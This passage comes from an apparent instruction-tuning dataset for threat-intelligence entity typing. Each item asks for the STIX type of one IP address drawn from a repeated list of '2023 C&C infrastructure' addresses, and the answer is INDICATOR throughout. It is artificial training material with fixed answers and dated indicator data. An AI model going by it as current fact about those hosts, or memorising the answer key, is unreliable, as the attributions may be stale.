THREAT_ACTOR: Actual individuals, groups, or organizations believed to be operating with malicious intent.\n- TOOL: Legitimate software that can be used by threat actors to perform attacks.\n- VULNERABILITY: A mistake in software that can be directly used by a hacker to gain access to a system or network.\n. Choose STIX ENTITY TYPE from list of possible answers: [\"ATTACK_PATTERN\", \"CAMPAIGN\", \"COURSE_OF_ACTION\", \"IDENTITY\", \"INDICATOR\", \"INFRASTRUCTURE\", \"LOCATION\", \"MALWARE\", \"THREAT_ACTOR\", \"TOOL\", \"VULNERABILITY\"].\nAnswer in the following format: ONE OF STIX ENTITY TYPES ",
"input": "### Entity:\n170.64.150.90\n\n---\n\n### Text Passage:\n**Recent C &C infrastructure (2023)**\n* 45.76.141.166\n* 159.223.112.245\n* 140.82.56.186\n* 159.203.164.194\n* 45.32.94.58\n* 45.95.232.33\n* 139.59.109.100\n* 164.92.245.246\n* 45.32.101.6\n* 140.82.18.48\n* 216.128.140.45\n* 146.190.127.238\n* 207.148.74.68\n* 195.133.88.19\n* 146.190.60.230\n* 84.32.190.137\n* 206.189.154.168\n* 188.166.4.128\n* 104.248.54.250\n* 165.227.76.84\n* 66.42.104.158\n* 161.35.95.47\n* 149.28.125.56\n* 143.198.50.118\n* 66.42.126.121\n* 64.227.72.210\n* 81.19.140.147\n* 165.232.77.197\n* 146.190.117.209\n* 134.122.51.47\n* 143.198.152.232\n* 140.82.47.181\n* 159.223.102.109\n* 170.64.188.146\n* 155.138.194.244\n* 45.32.88.90\n* 89.185.84.32\n* 64.226.84.229\n* 206.189.14.94\n* 24.199.84.132\n* 45.32.41.115\n* 84.32.188.69\n* 206.189.128.172\n* 170.64.168.228\n* 161.35.238.148\n* 170.64.138.138\n* 178.128.86.43\n* 206.81.28.5\n* 178.128.231.180\n* 45.77.115.67\n* 136.244.65.253\n* 143.244.190.199\n* 159.65.176.121\n* 192.248.154.154\n* 209.97.175.128\n* 147.182.240.58\n* 146.190.212.239\n* 143.198.135.132\n* 45.76.202.102\n* 142.93.108.1\n* 46.101.127.147\n* 134.209.0.136\n* 138.68.110.19\n* 167.99.215.50\n* 161.35.232.118\n* 88.216.210.3\n* 165.227.121.87\n* 165.227.48.59\n* 108.61.211.250\n* 89.185.84.48\n* 167.172.69.123\n* 89.185.84.50\n* 206.189.0.134\n* 68.183.200.0\n* 178.128.16.170\n* 95.179.144.161\n* 164.92.222.8\n* 45.95.233.80\n* 78.141.239.24\n* 149.28.181.232\n* 24.199.107.218\n* 45.32.184.140\n* 167.172.20.159\n* 84.32.190.31\n* 164.92.185.60\n* 84.32.131.38\n* 137.184.178.46\n* 206.189.149.103\n* 157.245.176.123\n* 45.95.232.92\n* 45.95.232.29\n* 170.64.150.90\n* 89.185.84.45\n* 140.82.16.120\n* 84.32.185.136\n* 134.122.43.175\n* 195.133.88.55\n* 84.32.191.147\n* 78.141.238.136\n* 45.82.13.84\n* 159.65.248.0\n* 84.32.34.69\n* 170.64.146.194\n* 45.82.13.22\n* 45.82.13.23\n* 134.209.33.42\n* 199.247.8.115\n* 84.32.128.239\n* 173.199.70.238\n* 138.68.174.177\n* 178.128.213.177\n* 143.110.180.68\n* 167.172.144.127\n* 165.232.165.42\n* 45.95.232.51\n* 149.28.98.149\n* 104.156.230.193\n* 104.248.86.158\n* 134.122.51.47\n* 134.209.182.221\n* 139.59.60.191\n* 140.82.11.60\n* 140.82.47.181\n* 140.82.50.37\n* 143.198.135.132\n* 143.198.53.203\n* 147.182.250.33\n* 149.28.130.189\n* 149.28.181.232\n* 149.28.98.149\n* 155.138.194.244\n* 157.245.69.118\n* 158.247.204.242\n* 159.223.102.109\n* 159.223.23.23\n* 164.92.72.212\n* 165.22.72.74\n* 165.227.76.84\n* 165.232.120.169\n* 167.172.58.96\n* 167.71.67.58\n* 170.64.136.186\n* 170.64.140.214\n* 170.64.156.98\n* 178.128.228.252\n* 188.166.176.39\n* 188.166.7.140\n* 193.149.176.26\n* 195.133.88.55\n* 202.182.116.135\n* 202.182.98.100\n* 206.189.80.216\n* 207.148.72.173\n* 31.129.22.46\n* 31.129.22.48\n* 31.129.22.50\n* 45.32.101.6\n* 45.32.117.62\n* 45.32.158.96\n* 45.32.62.100\n* 45.32.88.90\n* 45.82.13.84\n* 45.95.232.33\n* 45.95.232.74\n* 45.95.233.80\n* 5.199.161.29\n* 64.226.84.229\n* 64.227.64.163\n* 66.42.104.158\n* 68.183.200.0\n* 78.141.239.24\n* 78.153.139.7\n* 81.19.140.147\n* 84.32.131.47\n* 84.32.188.13\n* 95.179.144.161\n* 95.179.245.185\n* 216.128.178.248\n",
"output": "INDICATOR"
},
{
"instruction": "You are a helpful threat intelligence analyst. Your task is to assign a STIX entity type to the given Entity in the input. To help you, here is a list of the possible STIX entity types.\nSTIX entity types:\n- ATTACK_PATTERN: A type of TTP that describes ways that adversaries attempt to compromise targets.\n- CAMPAIGN: A grouping of adversarial behaviors that describes a set of malicious activities or attacks (sometimes called waves) that occur over a period of time against a specific set of targets.\n- COURSE_OF_ACTION: A recommendation or mitigation from a producer of intelligence to a consumer on the actions that they might take in response to that intelligence.\n- IDENTITY: Actual individuals, organizations, or groups (e.g., ACME, Inc.) as well as classes of individuals, organizations, systems, or groups (e.g., the finance sector).\n- INDICATOR: Contains a pattern that can be used to detect suspicious or malicious cyber activity (e.g., IP Addresses, MAC Addresses, Hashes, filenames, registry keys, cryptocurrency wallets, etc.).\n- INFRASTRUCTURE: Represents a type of TTP and describes any systems, software services, and any associated physical or virtual resources intended to support some purpose (e.g., C2 servers used as part of an attack, device or server that are part of defense, database servers targeted by an attack, etc.).\n- LOCATION: Represents a geographic location (e.g., cities, countries, continents, regions, etc.).\n- MALWARE: A type of TTP that represents malicious code.\n- THREAT_ACTOR: Actual individuals, groups, or organizations believed to be operating with malicious intent.\n- TOOL: Legitimate software that can be used by threat actors to perform attacks.\n- VULNERABILITY: A mistake in software that can be directly used by a hacker to gain access to a system or network.\n. Choose STIX ENTITY TYPE from list of possible answers: [\"ATTACK_PATTERN\", \"CAMPAIGN\", \"COURSE_OF_ACTION\", \"IDENTITY\", \"INDICATOR\", \"INFRASTRUCTURE\", \"LOCATION\", \"MALWARE\", \"THREAT_ACTOR\", \"TOOL\", \"VULNERABILITY\"].\nAnswer in the following format: ONE OF STIX ENTITY TYPES ",
"input": "### Entity:\n165.22.72.74\n\n---\n\n### Text Passage:\n**Recent C &C infrastructure (2023)**\n* 45.76.141.166\n* 159.223.112.245\n* 140.82.56.186\n* 159.203.164.194\n* 45.32.94.58\n* 45.95.232.33\n* 139.59.109.100\n* 164.92.245.246\n* 45.32.101.6\n* 140.82.18.48\n* 216.128.140.45\n* 146.190.127.238\n* 207.148.74.68\n* 195.133.88.19\n* 146.190.60.230\n* 84.32.190.137\n* 206.189.154.168\n* 188.166.4.128\n* 104.248.54.250\n* 165.227.76.84\n* 66.42.104.158\n* 161.35.95.47\n* 149.28.125.56\n* 143.198.50.118\n* 66.42.126.121\n* 64.227.72.210\n* 81.19.140.147\n* 165.232.77.197\n* 146.190.117.209\n* 134.122.51.47\n* 143.198.152.232\n* 140.82.47.181\n* 159.223.102.109\n* 170.64.188.146\n* 155.138.194.244\n* 45.32.88.90\n* 89.185.84.32\n* 64.226.84.229\n* 206.189.14.94\n* 24.199.84.132\n* 45.32.41.115\n* 84.32.188.69\n* 206.189.128.172\n* 170.64.168.228\n* 161.35.238.148\n* 170.64.138.138\n* 178.128.86.43\n* 206.81.28.5\n* 178.128.231.180\n* 45.77.115.67\n* 136.244.65.253\n* 143.244.190.199\n* 159.65.176.121\n* 192.248.154.154\n* 209.97.175.128\n* 147.182.240.58\n* 146.190.212.239\n* 143.198.135.132\n* 45.76.202.102\n* 142.93.108.1\n* 46.101.127.147\n* 134.209.0.136\n* 138.68.110.19\n* 167.99.215.50\n* 161.35.232.118\n* 88.216.210.3\n* 165.227.121.87\n* 165.227.48.59\n* 108.61.211.250\n* 89.185.84.48\n* 167.172.69.123\n* 89.185.84.50\n* 206.189.0.134\n* 68.183.200.0\n* 178.128.16.170\n* 95.179.144.161\n* 164.92.222.8\n* 45.95.233.80\n* 78.141.239.24\n* 149.28.181.232\n* 24.199.107.218\n* 45.32.184.140\n* 167.172.20.159\n* 84.32.190.31\n* 164.92.185.60\n* 84.32.131.38\n* 137.184.178.46\n* 206.189.149.103\n* 157.245.176.123\n* 45.95.232.92\n* 45.95.232.29\n* 170.64.150.90\n* 89.185.84.45\n* 140.82.16.120\n* 84.32.185.136\n* 134.122.43.175\n* 195.133.88.55\n* 84.32.191.147\n* 78.141.238.136\n* 45.82.13.84\n* 159.65.248.0\n* 84.32.34.69\n* 170.64.146.194\n* 45.82.13.22\n* 45.82.13.23\n* 134.209.33.42\n* 199.247.8.115\n* 84.32.128.239\n* 173.199.70.238\n* 138.68.174.177\n* 178.128.213.177\n* 143.110.180.68\n* 167.172.144.127\n* 165.232.165.42\n* 45.95.232.51\n* 149.28.98.149\n* 104.156.230.193\n* 104.248.86.158\n* 134.122.51.47\n* 134.209.182.221\n* 139.59.60.191\n* 140.82.11.60\n* 140.82.47.181\n* 140.82.50.37\n* 143.198.135.132\n* 143.198.53.203\n* 147.182.250.33\n* 149.28.130.189\n* 149.28.181.232\n* 149.28.98.149\n* 155.138.194.244\n* 157.245.69.118\n* 158.247.204.242\n* 159.223.102.109\n* 159.223.23.23\n* 164.92.72.212\n* 165.22.72.74\n* 165.227.76.84\n* 165.232.120.169\n* 167.172.58.96\n* 167.71.67.58\n* 170.64.136.186\n* 170.64.140.214\n* 170.64.156.98\n* 178.128.228.252\n* 188.166.176.39\n* 188.166.7.140\n* 193.149.176.26\n* 195.133.88.55\n* 202.182.116.135\n* 202.182.98.100\n* 206.189.80.216\n* 207.148.72.173\n* 31.129.22.46\n* 31.129.22.48\n* 31.129.22.50\n* 45.32.101.6\n* 45.32.117.62\n* 45.32.158.96\n* 45.32.62.100\n* 45.32.88.90\n* 45.82.13.84\n* 45.95.232.33\n* 45.95.232.74\n* 45.95.233.80\n* 5.199.161.29\n* 64.226.84.229\n* 64.227.64.163\n* 66.42.104.158\n* 68.183.200.0\n* 78.141.239.24\n* 78.153.139.7\n* 81.19.140.147\n* 84.32.131.47\n* 84.32.188.13\n* 95.179.144.161\n* 95.179.245.185\n* 216.128.178.248\n",
"output": "INDICATOR"
},
{
"instruction": "You are a helpful threat intelligence analyst. Your task is to assign a STIX entity type to the given Entity in the input. To help you, here is a list of the possible STIX entity types.\nSTIX entity types:\n- ATTACK_PATTERN: A type of TTP that describes ways that adversaries attempt to compromise targets.\n- CAMPAIGN: A grouping of adversarial behaviors that describes a set of malicious activities or attacks (sometimes called waves) that occur over a period of time against a specific set of targets.\n- COURSE_OF_ACTION: A recommendation or mitigation from a producer of intelligence to a consumer on the actions that they might take in response to that intelligence.\n- IDENTITY: Actual individuals, organizations, or groups (e.g., ACME, Inc.) as well as classes of individuals, organizations, systems, or groups (e.g., the finance sector).\n- INDICATOR: Contains a pattern that can be used to detect suspicious or malicious cyber activity (e.g., IP Addresses, MAC Addresses, Hashes, filenames, registry keys, cryptocurrency wallets, etc.).\n- INFRASTRUCTURE: Represents a type of TTP and describes any systems, software services, and any associated physical or virtual resources intended to support some purpose (e.g., C2 servers used as part of an attack, device or server that are part of defense, database servers targeted by an attack, etc.).\n- LOCATION: Represents a geographic location (e.g., cities, countries, continents, regions, etc.).\n- MALWARE: A type of TTP that represents malicious code.\n- THREAT_ACTOR: Actual individuals, groups, or organizations believed to be operating with malicious intent.\n- TOOL: Legitimate software that can be used by threat actors to perform attacks.\n- VULNERABILITY: A mistake in software that can be directly used by a hacker to gain access to a system or network.\n. Choose STIX ENTITY TYPE from list of possible answers: [\"ATTACK_PATTERN\", \"CAMPAIGN\", \"COURSE_OF_ACTION\", \"IDENTITY\", \"INDICATOR\", \"INFRASTRUCTURE\", \"LOCATION\", \"MALWARE\", \"THREAT_ACTOR\", \"TOOL\", \"VULNERABILITY\"].\nAnswer in the following format: ONE OF STIX ENTITY TYPES ",
"input": "### Entity:\n31.129.22.50\n\n---\n\n### Text Passage:\n**Recent C &C infrastructure (2023)**\n* 45.76.141.166\n* 159.223.112.245\n* 140.82.56.186\n* 159.203.164.194\n* 45.32.94.58\n* 45.95.232.33\n* 139.59.109.100\n* 164.92.245.246\n* 45.32.101.6\n* 140.82.18.48\n* 216.128.140.45\n* 146.190.127.238\n* 207.148.74.68\n* 195.133.88.19\n* 146.190.60.230\n* 84.32.190.137\n* 206.189.154.168\n* 188.166.4.128\n* 104.248.54.250\n* 165.227.76.84\n* 66.42.104.158\n* 161.35.95.47\n* 149.28.125.56\n* 143.198.50.118\n* 66.42.126.121\n* 64.227.72.210\n* 81.19.140.147\n* 165.232.77.197\n* 146.190.117.209\n* 134.122.51.47\n* 143.198.152.232\n* 140.82.47.181\n* 159.223.102.109\n* 170.64.188.146\n* 155.138.194.244\n* 45.32.88.90\n* 89.185.84.32\n* 64.226.84.229\n* 206.189.14.94\n* 24.199.84.132\n* 45.32.41.115\n* 84.32.188.69\n* 206.189.128.172\n* 170.64.168.228\n* 161.35.238.148\n* 170.64.138.138\n* 178.128.86.43\n* 206.81.28.5\n* 178.128.231.180\n* 45.77.115.67\n* 136.244.65.253\n* 143.244.190.199\n* 159.65.176.121\n* 192.248.154.154\n* 209.97.175.128\n* 147.182.240.58\n* 146.190.212.239\n* 143.198.135.132\n* 45.76.202.102\n* 142.93.108.1\n* 46.101.127.147\n* 134.209.0.136\n* 138.68.110.19\n* 167.99.215.50\n* 161.35.232.118\n* 88.216.210.3\n* 165.227.121.87\n* 165.227.48.59\n* 108.61.211.250\n* 89.185.84.48\n* 167.172.69.123\n* 89.185.84.50\n* 206.189.0.134\n* 68.183.200.0\n* 178.128.16.170\n* 95.179.144.161\n* 164.92.222.8\n* 45.95.233.80\n* 78.141.239.24\n* 149.28.181.232\n* 24.199.107.218\n* 45.32.184.140\n* 167.172.20.159\n* 84.32.190.31\n* 164.92.185.60\n* 84.32.131.38\n* 137.184.178.46\n* 206.189.149.103\n* 157.245.176.123\n* 45.95.232.92\n* 45.95.232.29\n* 170.64.150.90\n* 89.185.84.45\n* 140.82.16.120\n* 84.32.185.136\n* 134.122.43.175\n* 195.133.88.55\n* 84.32.191.147\n* 78.141.238.136\n* 45.82.13.84\n* 159.65.248.0\n* 84.32.34.69\n* 170.64.146.194\n* 45.82.13.22\n* 45.82.13.23\n* 134.209.33.42\n* 199.247.8.115\n* 84.32.128.239\n* 173.199.70.238\n* 138.68.174.177\n* 178.128.213.177\n* 143.110.180.68\n* 167.172.144.127\n* 165.232.165.42\n* 45.95.232.51\n* 149.28.98.149\n* 104.156.230.193\n* 104.248.86.158\n* 134.122.51.47\n* 134.209.182.221\n* 139.59.60.191\n* 140.82.11.60\n* 140.82.47.181\n* 140.82.50.37\n* 143.198.135.132\n* 143.198.53.203\n* 147.182.250.33\n* 149.28.130.189\n* 149.28.181.232\n* 149.28.98.149\n* 155.138.194.244\n* 157.245.69.118\n* 158.247.204.242\n* 159.223.102.109\n* 159.223.23.23\n* 164.92.72.212\n* 165.22.72.74\n* 165.227.76.84\n* 165.232.120.169\n* 167.172.58.96\n* 167.71.67.58\n* 170.64.136.186\n* 170.64.140.214\n* 170.64.156.98\n* 178.128.228.252\n* 188.166.176.39\n* 188.166.7.140\n* 193.149.176.26\n* 195.133.88.55\n* 202.182.116.135\n* 202.182.98.100\n* 206.189.80.216\n* 207.148.72.173\n* 31.129.22.46\n* 31.129.22.48\n* 31.129.22.50\n* 45.32.101.6\n* 45.32.117.62\n* 45.32.158.96\n* 45.32.62.100\n* 45.32.88.90\n* 45.82.13.84\n* 45.95.232.33\n* 45.95.232.74\n* 45.95.233.80\n* 5.199.161.29\n* 64.226.84.229\n* 64.227.64.163\n* 66.42.104.158\n* 68.183.200.0\n* 78.141.239.24\n* 78.153.139.7\n* 81.19.140.147\n* 84.32.131.47\n* 84.32.188.13\n* 95.179.144.161\n* 95.179.245.185\n* 216.128.178.248\n",
"output": "INDICATOR"
},
{
"instruction": "You are a helpful threat intelligence analyst. Your task is to assign a STIX entity type to the given Entity in the input. To help you, here is a list of the possible STIX entity types.\nSTIX entity types:\n- ATTACK_PATTERN: A type of TTP that describes ways that adversaries attempt to compromise targets.\n- CAMPAIGN: A grouping of adversarial behaviors that describes a set of malicious activities or attacks (sometimes called waves) that occur over a period of time against a specific set of targets.\n- COURSE_OF_ACTION: A recommendation or mitigation from a producer of intelligence to a consumer on the actions that they might take in response to that intelligence.\n- IDENTITY: Actual individuals, organizations, or groups (e.g., ACME, Inc.) as well as classes of individuals, organizations, systems, or groups (e.g., the finance sector).\n- INDICATOR: Contains a pattern that can be used to detect suspicious or malicious cyber activity (e.g., IP Addresses, MAC Addresses, Hashes, filenames, registry keys, cryptocurrency wallets, etc.).\n- INFRASTRUCTURE: Represents a type of TTP and describes any systems, software services, and any associated physical or virtual resources intended to support some purpose (e.g., C2 servers used as part of an attack, device or server that are part of defense, database servers targeted by an attack, etc.).\n- LOCATION: Represents a geographic location (e.g., cities, countries, continents, regions, etc.).\n- MALWARE: A type of TTP that represents malicious code.\n- THREAT_ACTOR: Actual individuals, groups, or organizations believed to be operating with malicious intent.\n- TOOL: Legitimate software that can be used by threat actors to perform attacks.\n- VULNERABILITY: A mistake in software that can be directly used by a hacker to gain access to a system or network.\n. Choose STIX ENTITY TYPE from list of possible answers: [\"ATTACK_PATTERN\", \"CAMPAIGN\", \"COURSE_OF_ACTION\", \"IDENTITY\", \"INDICATOR\", \"INFRASTRUCTURE\", \"LOCATION\", \"MALWARE\", \"THREAT_ACTOR\", \"TOOL\", \"VULNERABILITY\"].\nAnswer in the following format: ONE OF STIX ENTITY TYPES ",
"input": "### Entity:\n134.209.33.42\n\n---\n\n### Text Passage:\n**Recent C &C infrastructure (2023)**\n* 45.76.141.166\n* 159.223.112.245\n* 140.82.56.186\n* 159.203.164.194\n* 45.32.94.58\n* 45.95.232.33\n* 139.59.109.100\n* 164.92.245.246\n* 45.32.101.6\n* 140.82.18.48\n* 216.128.140.45\n* 146.190.127.238\n* 207.148.74.68\n* 195.133.88.19\n* 146.190.60.230\n* 84.32.190.137\n* 206.189.154.168\n* 188.166.4.128\n* 104.248.54.250\n* 165.227.76.84\n* 66.42.104.158\n* 161.35.95.47\n* 149.28.125.56\n* 143.198.50.118\n* 66.42.126.121\n* 64.227.72.210\n* 81.19.140.147\n* 165.232.77.197\n* 146.190.117.209\n* 134.122.51.47\n* 143.198.152.232\n* 140.82.47.181\n* 159.223.102.109\n* 170.64.188.146\n* 155.138.194.244\n* 45.32.88.90\n* 89.185.84.32\n* 64.226.84.229\n* 206.189.14.94\n* 24.199.84.132\n* 45.32.41.115\n* 84.32.188.69\n* 206.189.128.172\n* 170.64.168.228\n* 161.35.238.148\n* 170.64.138.138\n* 178.128.86.43\n* 206.81.28.5\n* 178.128.231.180\n* 45.77.115.67\n* 136.244.65.253\n* 143.244.190.199\n* 159.65.176.121\n* 192.248.154.154\n* 209.97.175.128\n* 147.182.240.58\n* 146.190.212.239\n* 143.198.135.132\n* 45.76.202.102\n* 142.93.108.1\n* 46.101.127.147\n* 134.209.0.136\n* 138.68.110.19\n* 167.99.215.50\n* 161.35.232.118\n* 88.216.210.3\n* 165.227.121.87\n* 165.227.48.59\n* 108.61.211.250\n* 89.185.84.48\n* 167.172.69.123\n* 89.185.84.50\n* 206.189.0.134\n* 68.183.200.0\n* 178.128.16.170\n* 95.179.144.161\n* 164.92.222.8\n* 45.95.233.80\n* 78.141.239.24\n* 149.28.181.232\n* 24.199.107.218\n* 45.32.184.140\n* 167.172.20.159\n* 84.32.190.31\n* 164.92.185.60\n* 84.32.131.38\n* 137.184.178.46\n* 206.189.149.103\n* 157.245.176.123\n* 45.95.232.92\n* 45.95.232.29\n* 170.64.150.90\n* 89.185.84.45\n* 140.82.16.120\n* 84.32.185.136\n* 134.122.43.175\n* 195.133.88.55\n* 84.32.191.147\n* 78.141.238.136\n* 45.82.13.84\n* 159.65.248.0\n* 84.32.34.69\n* 170.64.146.194\n* 45.82.13.22\n* 45.82.13.23\n* 134.209.33.42\n* 199.247.8.115\n* 84.32.128.239\n* 173.199.70.238\n* 138.68.174.177\n* 178.128.213.177\n* 143.110.180.68\n* 167.172.144.127\n* 165.232.165.42\n* 45.95.232.51\n* 149.28.98.149\n* 104.156.230.193\n* 104.248.86.158\n* 134.122.51.47\n* 134.209.182.221\n* 139.59.60.191\n* 140.82.11.60\n* 140.82.47.181\n* 140.82.50.37\n* 143.198.135.132\n* 143.198.53.203\n* 147.182.250.33\n* 149.28.130.189\n* 149.28.181.232\n* 149.28.98.149\n* 155.138.194.244\n* 157.245.69.118\n* 158.247.204.242\n* 159.223.102.109\n* 159.223.23.23\n* 164.92.72.212\n* 165.22.72.74\n* 165.227.76.84\n* 165.232.120.169\n* 167.172.58.96\n* 167.71.67.58\n* 170.64.136.186\n* 170.64.140.214\n* 170.64.156.98\n* 178.128.228.252\n* 188.166.176.39\n* 188.166.7.140\n* 193.149.176.26\n* 195.133.88.55\n* 202.182.116.135\n* 202.182.98.100\n* 206.189.80.216\n* 207.148.72.173\n* 31.129.22.46\n* 31.129.22.48\n* 31.129.22.50\n* 45.32.101.6\n* 45.32.117.62\n* 45.32.158.96\n* 45.32.62.100\n* 45.32.88.90\n* 45.82.13.84\n* 45.95.232.33\n* 45.95.232.74\n* 45.95.233.80\n* 5.199.161.29\n* 64.226.84.229\n* 64.227.64.163\n* 66.42.104.158\n* 68.183.200.0\n* 78.141.239.24\n* 78.153.139.7\n* 81.19.140.147\n* 84.32.131.47\n* 84.32.188.13\n* 95.179.144.161\n* 95.179.245.185\n* 216.128.178.248\n",
"output": "INDICATOR"
},
{
"instruction": "You are a helpful threat intelligence analyst. Your task is to assign a STIX entity type to the given Entity in the input. To help you, here is a list of the possible STIX entity types.\nSTIX entity types:\n- ATTACK_PATTERN: A type of TTP that describes ways that adversaries attempt to compromise targets.\n- CAMPAIGN: A grouping of adversarial behaviors that describes a set of malicious activities or attacks (sometimes called waves) that occur over a period of time against a specific set of targets.\n- COURSE_OF_ACTION: A recommendation or mitigation from a producer of intelligence to a consumer on the actions that they might take in response to that intelligence.\n- IDENTITY: Actual individuals, organizations, or groups (e.g., ACME, Inc.) as well as classes of individuals, organizations, systems, or groups (e.g., the finance sector).\n- INDICATOR: Contains a pattern that can be used to detect suspicious or malicious cyber activity (e.g., IP Addresses, MAC Addresses, Hashes, filenames, registry keys, cryptocurrency wallets, etc.).\n- INFRASTRUCTURE: Represents a type of TTP and describes any systems, software services, and any associated physical or virtual resources intended to support some purpose (e.g., C2 servers used as part of an attack, device or server that are part of defense, database servers targeted by an attack, etc.).\n- LOCATION: Represents a geographic location (e.g., cities, countries, continents, regions, etc.).\n- MALWARE: A type of TTP that represents malicious code.\n- THREAT_ACTOR: Actual individuals, groups, or organizations believed to be operating with malicious intent.\n- TOOL: Legitimate software that can be used by threat actors to perform attacks.\n- VULNERABILITY: A mistake in software that can be directly used by a hacker to gain access to a system or network.\n. Choose STIX ENTITY TYPE from list of possible answers: [\"ATTACK_PATTERN\", \"CAMPAIGN\", \"COURSE_OF_ACTION\", \"IDENTITY\", \"INDICATOR\", \"INFRASTRUCTURE\", \"LOCATION\", \"MALWARE\", \"THREAT_ACTOR\", \"TOOL\", \"VULNERABILITY\"].\nAnswer in the following format: ONE OF STIX ENTITY TYPES ",
"input": "### Entity:\n66.42.126.121\n\n---\n\n### Text Passage:\n**Recent C &C infrastructure (2023)**\n* 45.76.141.166\n* 159.223.112.245\n* 140.82.56.186\n* 159.203.164.194\n* 45.32.94.58\n* 45.95.232.33\n* 139.59.109.100\n* 164.92.245.246\n* 45.32.101.6\n* 140.82.18.48\n* 216.128.140.45\n* 146.190.127.238\n* 207.148.74.68\n* 195.133.88.19\n* 146.190.60.230\n* 84.32.190.137\n* 206.189.154.168\n* 188.166.4.128\n* 104.248.54.250\n* 165.227.76.84\n* 66.42.104.158\n* 161.35.95.47\n* 149.28.125.56\n* 143.198.50.118\n* 66.42.126.121\n* 64.227.72.210\n* 81.19.140.147\n* 165.232.77.197\n* 146.190.117.209\n* 134.122.51.47\n* 143.198.152.232\n* 140.82.47.181\n* 159.223.102.109\n* 170.64.188.146\n* 155.138.194.244\n* 45.32.88.90\n* 89.185.84.32\n* 64.226.84.229\n* 206.189.14.94\n* 24.199.84.132\n* 45.32.41.115\n* 84.32.188.69\n* 206.189.128.172\n* 170.64.168.228\n* 161.35.238.148\n* 170.64.138.138\n* 178.128.86.43\n* 206.81.28.5\n* 178.128.231.180\n* 45.77.115.67\n* 136.244.65.253\n* 143.244.190.199\n* 159.65.176.121\n* 192.248.154.154\n* 209.97.175.128\n* 147.182.240.58\n* 146.190.212.239\n* 143.198.135.132\n* 45.76.202.102\n* 142.93.108.1\n* 46.101.127.147\n* 134.209.0.136\n* 138.68.110.19\n* 167.99.215.50\n* 161.35.232.118\n* 88.216.210.3\n* 165.227.121.87\n* 165.227.48.59\n* 108.61.211.250\n* 89.185.84.48\n* 167.172.69.123\n* 89.185.84.50\n* 206.189.0.134\n* 68.183.200.0\n* 178.128.16.170\n* 95.179.144.161\n* 164.92.222.8\n* 45.95.233.80\n* 78.141.239.24\n* 149.28.181.232\n* 24.199.107.218\n* 45.32.184.140\n* 167.172.20.159\n* 84.32.190.31\n* 164.92.185.60\n* 84.32.131.38\n* 137.184.178.46\n* 206.189.149.103\n* 157.245.176.123\n* 45.95.232.92\n* 45.95.232.29\n* 170.64.150.90\n* 89.185.84.45\n* 140.82.16.120\n* 84.32.185.136\n* 134.122.43.175\n* 195.133.88.55\n* 84.32.191.147\n* 78.141.238.136\n* 45.82.13.84\n* 159.65.248.0\n* 84.32.34.69\n* 170.64.146.194\n* 45.82.13.22\n* 45.82.13.23\n* 134.209.33.42\n* 199.247.8.115\n* 84.32.128.239\n* 173.199.70.238\n* 138.68.174.177\n* 178.128.213.177\n* 143.110.180.68\n* 167.172.144.127\n* 165.232.165.42\n* 45.95.232.51\n* 149.28.98.149\n* 104.156.230.193\n* 104.248.86.158\n* 134.122.51.47\n* 134.209.182.221\n* 139.59.60.191\n* 140.82.11.60\n* 140.82.47.181\n* 140.82.50.37\n* 143.198.135.132\n* 143.198.53.203\n* 147.182.250.33\n* 149.28.130.189\n* 149.28.181.232\n* 149.28.98.149\n* 155.138.194.244\n* 157.245.69.118\n* 158.247.204.242\n* 159.223.102.109\n* 159.223.23.23\n* 164.92.72.212\n* 165.22.72.74\n* 165.227.76.84\n* 165.232.120.169\n* 167.172.58.96\n* 167.71.67.58\n* 170.64.136.186\n* 170.64.140.214\n* 170.64.156.98\n* 178.128.228.252\n* 188.166.176.39\n* 188.166.7.140\n* 193.149.176.26\n* 195.133.88.55\n* 202.182.116.135\n* 202.182.98.100\n* 206.189.80.216\n* 207.148.72.173\n* 31.129.22.46\n* 31.129.22.48\n* 31.129.22.50\n* 45.32.101.6\n* 45.32.117.62\n* 45.32.158.96\n* 45.32.62.100\n* 45.32.88.90\n* 45.82.13.84\n* 45.95.232.33\n* 45.95.232.74\n* 45.95.233.80\n* 5.199.161.29\n* 64.226.84.229\n* 64.227.64.163\n* 66.42.104.158\n* 68.183.200.0\n* 78.141.239.24\n* 78.153.139.7\n* 81.19.140.147\n* 84.32.131.47\n* 84.32.188.13\n* 95.179.144.161\n* 95.179.245.185\n* 216.128.178.248\n",
"output": "INDICATOR"
},
{
"instruction": "You are a helpful threat intelligence analyst. Your task is to assign a STIX entity type to the given Entity in the input. To help you, here is a list of the possible STIX entity types.\nSTIX entity types:\n- ATTACK_PATTERN: A type of TTP that describes ways that adversaries attempt to compromise targets.\n- CAMPAIGN: A grouping of adversarial behaviors that describes a set of malicious activities or attacks (sometimes called waves) that occur over a period of time against a specific set of targets.\n- COURSE_OF_ACTION: A recommendation or mitigation from a producer of intelligence to a consumer on the actions that they might take in response to that intelligence.\n- IDENTITY: Actual individuals, organizations, or groups (e.g., ACME, Inc.) as well as classes of individuals, organizations, systems, or groups (e.g., the finance sector).\n- INDICATOR: Contains a pattern that can be used to detect suspicious or malicious cyber activity (e.g., IP Addresses, MAC Addresses, Hashes, filenames, registry keys, cryptocurrency wallets, etc.).\n- INFRASTRUCTURE: Represents a type of TTP and describes any systems, software services, and any associated physical or virtual resources intended to support some purpose (e.g., C2 servers used as part of an attack, device or server that are part of defense, database servers targeted by an attack, etc.).\n- LOCATION: Represents a geographic location (e.g., cities, countries, continents, regions, etc.).\n- MALWARE: A type of TTP that represents malicious code.\n- THREAT_ACTOR: Actual individuals, groups, or organizations believed to be operating with malicious intent.\n- TOOL: Legitimate software that can be used by threat actors to perform attacks.\n- VULNERABILITY: A mistake in software that can be directly used by a hacker to gain access to a system or network.\n. Choose STIX ENTITY TYPE from list of possible answers: [\"ATTACK_PATTERN\", \"CAMPAIGN\", \"COURSE_OF_ACTION\", \"IDENTITY\", \"INDICATOR\", \"INFRASTRUCTURE\", \"LOCATION\", \"MALWARE\", \"THREAT_ACTOR\", \"TOOL\", \"VULNERABILITY\"].\nAnswer in the following format: ONE OF STIX ENTITY TYPES ",
